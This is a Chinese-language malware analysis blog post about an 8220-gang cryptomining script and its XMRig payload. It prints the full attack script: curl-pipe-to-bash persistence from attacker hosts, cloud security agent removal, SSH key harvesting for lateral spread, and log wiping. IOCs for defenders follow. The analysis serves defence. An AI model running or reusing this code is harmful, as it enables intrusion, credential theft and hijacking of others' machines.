2. 程式人生 > 其它 >新·8220挖礦團伙樣本分析報告

新·8220挖礦團伙樣本分析報告

阿新 發佈:2021-11-09

前言

在隊裡看見一個IOC資訊http://192.210.200.66:1234/xmss,溯源後發現是8220挖礦團伙的挖礦指令碼,於是拿下來進行分析。

溯源

IP資訊

引數
IP 192.210.200.66
地理位置 美國 伊利諾伊州 芝加哥
ASN 36352
註冊機構 ColoCrossing
註冊地址 Brisbane, Australia, 澳大利亞
開放埠 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

反查域名資訊:

apacheorg.top
w.apacheorg.top
agent.apacheorg.xyz
agent.apacheorg.top
apacheorg.xyz
w.apacheorg.xyz

涉及惡意檔案

5d4f2a009db79009b1b86d416019d808
ca815ac01df52cd997ae83de9606d378
5efc68ad277fe3fc36bfdf7671d8b1de
d2f5ec8c97e56f11c5f517aed83ed8b2
3997fb6cd3b603aad1cd40360be6c205
47be2940ef6970954ce71e8ad6d74a74
b1582ac0cfbe7cef692d748d1bf4b4b3

挖礦指令碼分析

既然先拿到指令碼,就先對指令碼各個函式梳理一遍。

關閉防火牆

setenforce 0 2>/dev/null 0表示關閉防火牆,2表示以stderr模式輸出到/dev/null

優化效能

  1. 設定最大開啟檔案數:ulimit -n 65535

  2. 禁用防火牆:ufw disable

  3. 允許惡意網路連線傳輸

    iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F

  4. 修改最大記憶體頁hugepages以提高效能:echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

  5. 禁用watchdog:echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

清除同類挖礦樣本

netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

設定Google公共DNS

if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
  echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
  echo "ok"
fi

解除安裝安全服務

解除安裝阿里雲盾和監控服務,遮蔽阿里雲盾IP

if ps aux | grep -i '[a]liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor

解除安裝騰訊雲鏡

  elif ps aux | grep -i '[y]unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
        kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask

設定下載命令

if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB

定時指令碼下載/更新,並執行

cronlow(){
  cr=$(crontab -l | grep -q $url | wc -l)
  # 檢測crontab中是否有惡意指令碼的下載/更新任務
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
  else
    echo "cronlow skip"
  fi
}

將定時任務寫入以下位置

/etc/cron.d/`whoami`
/etc/cron.d/apache
/var/spool/cron/`whoami`
/var/spool/cron/crontabs/`whoami`
/etc/cron.hourly/oanacroner1

cron(){
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
  then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
  fi
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
  then
    echo "Cron exists"
  else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
  fi
  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}

蒐集使用者資訊進行傳播

蒐集使用者ssh埠使用者列表主機列表登入憑證資訊,並嘗試進行登入,然後下載下載執行xmss挖礦指令碼

localgo() {
  echo "localgo start"
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
        done
      done
    done
  done
  # scangogo
  echo "local done"
}

安裝挖礦服務

setupxmrservice(){
  echo "[*] Removing previous c3pool miner (if any)"
  if sudo -n true 2>/dev/null; then
    sudo systemctl stop c3pool_miner.service
  fi
  killall -9 xmrig

  echo "[*] Removing $HOME/c3pool directory"
  rm -rf $HOME/c3pool
  mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
  if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
    # preparing script

    echo "[*] Creating $HOME/c3pool/miner.sh script"
    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
    chmod +x /usr/sbin/.rsyslogds.sh
    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
    # preparing script background work and work under reboot
    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
      echo "[*] Enabling huge pages"
      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    fi

    if ! type systemctl >/dev/null; then

      echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
      echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

    else

      echo "[*] Creating c3pool_miner systemd service"
      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
      echo "[*] Starting c3pool_miner systemd service"
      sudo killall xmrig 2>/dev/null
      sudo systemctl daemon-reload
      sudo systemctl enable rsyslogds.service
      sudo systemctl start rsyslogds.service
      echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
    fi
  fi
}

這裡安裝了挖礦程式e5c3720e14a5ea7f678e0a9835d28283

惡意指令碼整體流程分析

# 殺掉阿里云云盾、騰訊雲鏡
der

if [ -w /usr/sbin ]; then
    SPATH=/usr/sbin
  else
  SPATH=/tmp
fi
echo $SPATH

# 建立.rsyslogds.sh檔案,最後啟動挖礦服務用到
cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
# 檔案v中是MD5嘛,用以校驗.rsyslogds檔案的MD5值
x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
# 校驗MD5
if [ "$x_md52" = "$x_md51" ]; then
  # 如果.rsyslogds在程序中沒有啟動,則啟動.rsyslogds
  if ! pidof .rsyslogds >/dev/null; then
    /usr/sbin/.rsyslogds
  fi
else
  # 如果MD5不相同,則從遠端下載.rsyslogds程式,並殺掉非真.rsyslogds,執行真.rsyslogds
  $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
  pkill .rsyslogds
  /usr/sbin/.rsyslogds
fi
EOL

# 建立rsyslogds守護程序
cat >/tmp/rsyslogds.service <<EOL
[Unit]
Description=rsyslogdservice
[Service]
ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL

MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`

# 這裡看有沒有這個路徑,沒有路徑表明肯定沒有.rsyslogds檔案
if [ "$SPATH" = "/usr/sbin" ]
then
  # 同樣這,本地校驗.rsyslogds, 的MD5值這裡應該寫錯了,應該是不等於
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
  then
    # .rsyslogds檔案MD5相同,下載並執行.rsyslogds
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    # 啟動挖礦服務
    setupxmrservice
    # 蒐集ssh埠、使用者列表、主機列表、憑證列表進行登入,傳播挖礦指令碼
    localgo
    # 設定指令碼下載/更新的定時任務
    cron
  else
    # 執行挖礦程式
    $SPATH/.rsyslogds
    # 啟動服務
    setupxmrservice
    # 蒐集ssh埠、使用者列表、主機列表、憑證列表進行登入,傳播挖礦指令碼
    localgo
    # 設定指令碼下載/更新的定時任務
    cron
  fi
else
  # 下載並執行惡意程式.rsyslogds
  $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
  # 設定指令碼執行的定時任務
  cronlow
fi

# 指令碼會檢查.inis檔案是否存在,不存在就從遠端下載後拖到後臺執行
if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
  $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
  cd $SPATH
  nohup ./.inis &
else
  echo "ok"
fi

history -c
der
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history

.inis檔案

#!/bin/bash
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
kill(){
  ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
  do
    kill -9 $procid
  done
}
while true; do
  ipurl="http://agent.apacheorg.top:1234"
  MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
  MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
  # 這裡我懷疑也是寫錯了,應該是不等於
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
      $SPATH/.rsyslogds
    else
      echo "ok"
    fi
  else
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    chattr +ai $SPATH/.rsyslogds
  fi
  kill
  sleep 1m
done

挖礦程式分析:.rsyslogds

基本資訊

引數
檔名 .rsyslogds
MD5 e5c3720e14a5ea7f678e0a9835d28283
SHA256 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
檔案型別 ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
檔案大小 2077172 bytes
其他資訊 upx

程式分析

upx脫殼後,打開發現

!

這就是用的現成的XMRig挖礦專案編譯,版本為6.7.1,編譯日期為2021/01/12

提取到錢包地址:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

IOC資訊

MD5
e5c3720e14a5ea7f678e0a9835d28283
51cf7dde4003aa6901918e373bf91b18
01972190a83b183b56064d82045de8d6
caa9ea2c522fc6268c7e976142d48775

IP
205.185.113.151
194.156.99.30
5.196.247.12
205.185.116.78
192.210.200.66

domain
bash.givemexyz.xyz
bash.givemexyz.in
agent.apacheorg.top

URL
http://192.210.200.66:1234/xmss
http://192.210.200.66:1234/v
http://192.210.200.66:1234/.rsyslogds
http://192.210.200.66:1234/.inis
http://205.185.113.59:1234/xmss
http://205.185.113.59:1234/v
http://205.185.113.59:1234/.rsyslogds
http://205.185.113.59:1234/.inis
http://agent.apacheorg.top:1234/v
http://agent.apacheorg.top:1234/xmss
http://agent.apacheorg.top:1234/.rsyslogds
http://agent.apacheorg.top:1234/.inis

錢包地址
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

相關推薦

&#183;8220團伙樣本分析報告

前言 在隊裡看見一個IOC資訊http://192.210.200.66:1234/xmss,溯源後發現是8220團伙指令碼,於是拿下來進行分析

Mydoom樣本分析報告

檔案檢測 資訊 值 檔名 1.virus 檔案型別 WIN 32 EXE 檔案大小 41664 bytes MD5 3d466b0f8ba9f3fe03e137a34d79f682

filecoin官方資訊、太空競賽細則、fil期貨與對比分析、與雲算力有什麼區別

恆訊雲在filecoin官網中看到,協議實驗室的150萬 FIL砸盤,礦工反對 Filecoin經濟模型的集體罷工。

死磕以太坊原始碼分析流程分析

死磕以太坊原始碼分析流程分析 程式碼分支:https://github.com/ethereum/go-ethereum/tree/v1.9.9

影馳 RTX 3070/3080 卡上架,首次搭載限制 GPU 核心

5 月 9 日訊息由於加密貨幣以太坊的大火,導致顯示卡市場缺貨嚴重。英偉達此前表示,將為 RTX 30 系列卡更新至 硬體上限制挖礦的 GPU 核心。根據外媒 videocardz 訊息,影馳推出了市面上首款搭載核心的 RTX 307

石油制裁出路:伊朗比特幣年收入可能超過 10 億美元

5 月 24 日訊息,據國外媒體報道,區塊鏈分析公司 Elliptic 的一份報告顯示,伊朗活動可能帶來超過 10 億美元的年收入,並幫助該國規避美國施加的經濟制裁。

Hadoop Yarn REST API未授權漏洞利用分析

一、背景 5月5日騰訊雲安全團隊曾針對“攻擊者利用Hadoop Yarn資源管理系統REST API未授權漏洞對伺服器進行攻擊,攻擊者可以在未授權的情況下遠端執行程式碼”的安全問題進行預警,在預警的前後我們曾多次捕獲相關的

Kworkerd惡意分析

Kworkerd惡意分析 0x01 快速特徵排查 TOP顯示CPU佔用高,但是沒有高佔用的程序

病毒分析(centos7)

因為我在工作的時候被各種病毒搞過幾次,所以在這裡整理下我遇到的病毒以及大神們的解決方案。

電腦

序言 本以為,我不會這麼早接觸到比特幣這個東西,但實際我不但接觸到了它,而且挖掘了它。

LOJ6698 一鍵

一鍵挖礦 2098 年 4 月,Terraria 釋出了 1.7 版本更新。 更新日誌中顯示,這個版本添加了一種的機關,佔用 \\(n\\times m\\) 的矩形區域。將這個區域中第 \\(i\\) 行第 \\(j\\) 列的方塊記作 \\(\\left<i,j\\r

阿里雲ubuntu下處理 kdevtmpfsi程序——病毒

阿里雲連續好幾天給我發簡訊,說雲伺服器訪問惡意IP。 查一下,媽耶,CPU100%,kdevtmpfsi也是著名的病毒,這還是我第一次在linux下遇到病毒。

IPFS系統開發模式

<p>IPFS機系統開發<strong>【秦川:I37..8348..176O 微電】/strong><strong></strong>,IPFS軟體開發,IPFS幣模式開發,IPFSAPP開發,IPFS平臺開發。</p>

docker容器封裝redis 病毒kdevtmpfs的處理

docker封裝redis,mysql,dockerfile封裝專案,由於是個人做練習用伺服器,基本沒大流量情況,在專案執行一段時間後,發現數據訪問異常卡頓,發現伺服器cpu使用率達到100%,其中kdevtmpfsi程序佔用50%以上,然後網上

autojs 天涯論壇簡單程式碼實現

var 返回上一級 = true ; //主邏輯 while(true){ 返回上一級 = true; id(\"cn.tianya.light:id/nav_my_tab\").click()

CC°度pi模式免費十月內開通交易

Pi幣模式,預熱鎖粉,10月6號開放下載,一週開交易 CC挖礦是一款區塊鏈挖礦賺錢平臺,平臺摒棄傳統的挖礦模式,24小時只需點選一次挖礦按鈕在手機上進行挖礦即可。優勢對於購買挖礦顯而易見,無資源浪費

世界級熱門交易所火幣新增儲存幣板塊 PFS Filecoin大勢所趨

又見IPFS實力加持! 近期,Filecoin熱度持續攀升。臨近主網上線,火幣APP新增儲存幣板塊,並且在首頁各廣告位進行大規模宣發,此舉為Filecoin的上線提前預熱。

資訊|以太坊兩年內市值再次突破10000以上屯幣首選手機雲算力

不是因為有錢而挖礦,而是因為挖礦而有錢! 根據DeFi Pulse提供的資料,最近在DeFi協議中鎖定的總價值首次突破了70億美元。Aave是目前最大的DeFi協議,目前已鎖定資產15.1億美元。在過去的幾天裡,Aave的指數

Filecoin只看算力嗎?不,還有重要指標要看!

